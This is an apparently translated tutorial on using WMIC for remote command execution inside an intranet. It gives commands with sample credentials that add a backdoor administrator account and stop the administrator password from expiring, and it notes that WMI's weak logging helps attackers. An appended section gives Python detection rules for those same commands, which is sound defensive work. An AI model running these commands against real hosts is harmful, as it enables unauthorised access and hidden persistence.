Use of WMIC on an intranet

Prerequisites:

1. The remote server has the Windows Management Instrumentation service running, TCP port 135 open, and a firewall that allows traffic on that port (the default).

2. The local security policy "Network access: Sharing and security model for local accounts" on the remote server is set to "Classic - local users authenticate as themselves".

3. You know an account and password valid on the remote server or host.

wmic /node:"192.168.1.20" /user:"domain\administrator" /password:"123456"

### Wmic
WMI stands for Windows Management Instrumentation. It is present in every Windows operating system and consists of a powerful set of tools for managing local or remote Windows systems. Attackers use WMI because, by default, Windows does not record these operations in its logs, and because the attack script does not need to be written to disk, which increases concealment. WMIC is the recommended tool for remote command execution.

Common commands

Execute a batch script on a remote system:

wmic /node:192.168.17.138 /user:test /password:!@#123QWE process call create c:\programdata\test.bat

Execute a single command on a remote system:

wmic /node:192.168.17.138 /user:test /password:!@#123QWE process call create "cmd.exe /c net user test1 !@#123QWE /add && net localgroup administrators test1 /add"

Tool description
1. The remote system must have the Windows Management Instrumentation service running and port 135 open.
2. The local security policy "Network access: Sharing and security model for local accounts" on the remote system must be set to "Classic - local users authenticate as themselves".
3. The WMIC command is executed on the remote system with administrator privileges.
4. If the remote firewall is enabled, the connection fails.
5. If the error "Invalid Global Switch" is reported, wrap a node name that contains a hyphen (-) in double quotation marks and the command runs normally.

Set a password to never expire with WMIC

wmic useraccount where name="administrator" set passwordexpires=false
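The post says Windows does not log these operations by default, which is why a defender relies on process-creation telemetry instead: Sysmon Event ID 1, or Security event 4688 with command-line auditing enabled, records the parent (creator) process, so a remote `process call create` shows up on the target as WmiPrvSE.exe spawning cmd.exe, and the WMIC invocations themselves show up on the source host. The following detection logic is an added example, not part of the original post; it covers the remote process-creation commands, the `net localgroup administrators ... /add` payload and the `passwordexpires=false` change shown above. The event records are constructed to mimic Sysmon's `Image`, `ParentImage` and `CommandLine` fields; `RecordId` and the sample values are made up for the example.

```python
"""Flag process-creation events matching the WMIC patterns described in the post.

Added example, not code from the original post. The events below are
constructed to resemble Sysmon Event ID 1 fields; they are not real telemetry.
"""
import re

# Interpreters that a WMI provider host has no business spawning on a server.
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line patterns derived from the commands shown on this page.
PATTERNS = {
    # wmic ... /node:<host> ... process call create ...
    "wmic_remote_process_create": re.compile(
        r"wmic(?:\.exe)?\s.*?/node:\S+.*?process\s+call\s+create", re.I),
    # net localgroup administrators <user> /add
    "net_localgroup_admins_add": re.compile(
        r"net(?:1)?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add", re.I),
    # wmic useraccount ... set passwordexpires=false
    "wmic_password_never_expires": re.compile(
        r"wmic(?:\.exe)?\s.*?useraccount.*?set\s+passwordexpires\s*=\s*false", re.I),
}


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of finding names that apply to one process-creation event."""
    findings = []
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    # Target-side indicator: the WMI provider host launched a shell.
    if parent == "wmiprvse.exe" and image in SHELL_IMAGES:
        findings.append("wmiprvse_spawned_shell")
    # Source-side and payload indicators from the command line.
    for name, rx in PATTERNS.items():
        if rx.search(cmd):
            findings.append(name)
    return findings


def triage(events):
    """Return (RecordId, findings) for every event that produced at least one finding."""
    hits = []
    for event in events:
        findings = classify(event)
        if findings:
            hits.append((event["RecordId"], findings))
    return hits


# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    {"RecordId": 1, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"C:\Windows\system32\wbem\wmiprvse.exe"},
    {"RecordId": 2, "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c net user test1 !@#123QWE /add && net localgroup administrators test1 /add"},
    {"RecordId": 3, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic /node:192.168.17.138 /user:test /password:!@#123QWE process call create c:\programdata\test.bat"},
    {"RecordId": 4, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic useraccount where name="administrator" set passwordexpires=false'},
    {"RecordId": 5, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic os get caption"},
]

if __name__ == "__main__":
    for record_id, findings in triage(SAMPLE_EVENTS):
        print(record_id, findings)
```

Record 2 is the one seen on the target host and is the strongest signal, since it does not depend on the attacker's command line at all: a WmiPrvSE.exe parent with a shell child is rare outside of administration scripts and is worth alerting on regardless of the arguments. Records 3 and 4 are only visible on the host where WMIC was typed, so both ends need process auditing for the full picture.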
